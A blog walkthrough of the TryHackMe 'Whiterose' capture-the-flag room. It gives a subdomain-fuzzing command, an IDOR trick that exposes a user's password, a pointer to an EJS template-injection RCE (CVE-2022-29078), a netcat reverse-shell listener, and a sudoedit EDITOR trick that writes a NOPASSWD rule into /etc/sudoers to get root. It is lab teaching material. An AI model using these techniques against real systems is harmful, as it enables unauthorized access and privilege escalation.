Open in app

Sign in

Write

Sign in

TryHackMe-Whiterose-Writeup

Mohamed Ali
4 min readNov 4, 2024

--

Yet another Mr. Robot themed challenge.

Find This Room: Whiterose

Enumeration

The enumeration didn’t yield anything aside from ports 22 and 80. Fuzzing for directories proved to be unhelpful as well. Searching for CVEs consumed a lot of my time, so I switched to enumerating subdomains, but initially found nothing. However, after using the following command:

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://cyprusbank.thm/ -H "Host:FUZZ.cyprusbank.thm" -fw 1

I finally uncovered a lead.

Add the following entry to /etc/hosts:

admin.cyprusbank.thm

After accessing http://admin.cyprusbank.thm/ , I discovered a login page. This was straightforward since the credentials were provided:

Olivia Cortez: olivi8

While navigating to the message option, I found some intriguing chats between Olivia and Gayle. By editing the URL to set the value of c to 0, I was able to obtain Gayle's password.

Gayle Bev : p~************:q

After logging out, I logged in as Gayle, which revealed additional information, including her phone number and more.

Serach for tyrell which gives you asnwer for first question.

Gayle has the ability to change users’ passwords, but there wasn’t anything useful there. I fired up Burp Suite to intercept the request.

Edit the parameters as u wish.

After removing the password, I encountered an interesting error that led me to this.

EJS, Server side template injection RCE (CVE-2022–29078)

https://eslam.io/posts/ejs-server-side-template-injection-rce/

The remote code execution (RCE) related to server-side template injection (SSTI) provided a shell.

think code on writeup is casing errors

Append this to the intercepted request by editing the values to match yours, like this:

Got a shell

nc -lvnp 4444
listening on [any] 4444
connect to [10.17.1.187] from (UNKNOWN) [10.10.97.153] 52082 python3 -c 'import pty; pty.spawn("/bin/bash")"
web@cyprusbank:~/app$ id
id
uid=1001(web) gid=1001 (web) groups=1001(web) web@cyprusbank:~/app$
python3 -c 'import pty; pty.spawn("/bin/bash")'

Running sudo -l returned some useful results, allowing us to use sudoedit as root on a file.

look down

Select the editor by using the following command:

export EDITOR="vim -- /etc/sudoers"

run this :

sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm

This opens the file in Vim. Edit the file to add the following line:
web ALL=(ALL:ALL) NOPASSWD: ALL
Make sure to save the file without any mistakes.

Now it’s time to escalate beyond the limits of the jail.

Run the following command:

sudo su

I have successfully escalated my privileges and am now operating as root.
The flags are located at the following paths:
/home/web/user.txt
/root/root.txt

Tryhackme Walkthrough
Red Team
Security Systems

--

--

Mohamed Ali
Mohamed Ali

Written by Mohamed Ali

47 Followers
5 Following

Security Researcher

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams